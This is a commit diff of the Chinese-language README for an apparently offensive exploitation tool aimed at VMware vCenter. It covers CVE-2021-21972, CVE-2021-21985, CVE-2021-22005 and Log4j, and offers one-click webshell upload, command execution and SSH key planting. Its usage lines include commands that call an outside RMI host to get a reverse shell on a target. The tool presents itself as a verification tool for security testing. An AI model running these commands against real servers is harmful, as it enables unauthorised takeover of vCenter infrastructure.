readme

Schira4396 · Oct 6, 2022 · e84fc13 · e84fc13
1 parent 6c9a2e5
commit e84fc13
Showing 1 changed file with 22 additions and 4 deletions.
diff --git a/README.md b/README.md
@@ -2,16 +2,26 @@
 #### 0.必读
 目前本工具处于刚上线阶段，可能会有很多BUG，如果遇到bug请提issue
 
-后续会集成基于CVE-2021-21985一键添加管理员用户的功能，这样就不必非要在服务器执行ldap_adduer脚本了。
 
-以及vcenter的log4j
+
+目前集成了对Vcenter log4j漏洞的检测和利用功能，思路来自于带哥[@j5s](https://github.com/j5s)的项目[SuperFastjsonScan](https://github.com/j5s/SuperFastjsonScan)，原理参考[Golang实现RMI协议自动化检测Fastjson](https://www.anquanke.com/post/id/249402)，简单来说就是不借助dnslog之类的平台，只要你和目标主机是通的并且你的主机/跳板没有被防火墙做端口限制，那就能直接验证目标是否远程调用了你的rmi服务。
+
+
+
+后续会集成基于CVE-2021-21985一键添加管理员用户的功能，这样就不必非要先拿shell，再通过python在服务器执行ldap_adduer脚本了，总之有更好的方式。
+
+
+
+后续
+
+
 
 Vmware workstation One Access ...
 
 VMware vRealize Operations Manager ...
 #### 1.它是什么
 
-一款针对Vcenter的综合利用工具，包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-2205，提供一键上传webshell，命令执行或者上传公钥使用SSH连接
+一款针对Vcenter（暂时）的综合**验证**工具，包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-2205，提供一键上传webshell，命令执行或者上传公钥并使用SSH连接的功能，以及针对Apache Log4j CVE-2021-44228漏洞在Vcenter上的检测和验证。
 
 #### 2.它的定位
 
@@ -27,6 +37,8 @@ go build -o main.exe
 ./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp
 ./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥
 ./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx
+./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j
+./main.exe -u https://192.168.1.1 -m log4center -t rshell -r rmi://xx.xx.xx.xx:1099/xx //get reverseshell
 ```
 
 #### 4.免责声明
@@ -39,4 +51,10 @@ go build -o main.exe
 
 #### 5.更新日志
 
-针对CVE-2021-21985添加了利用rmi反弹shell的功能，前提是你要启动一个rmi服务器，例如jndi-injection-exploit
+```bash
+V1.0 上线
+V1.1 针对CVE-2021-21985添加了利用rmi反弹shell的功能，前提是你要启动一个rmi服务器，例如jndi-injection-exploit
+V1.2 增加了针对Vcenter的log4j检测和验证能力
+...
+```
+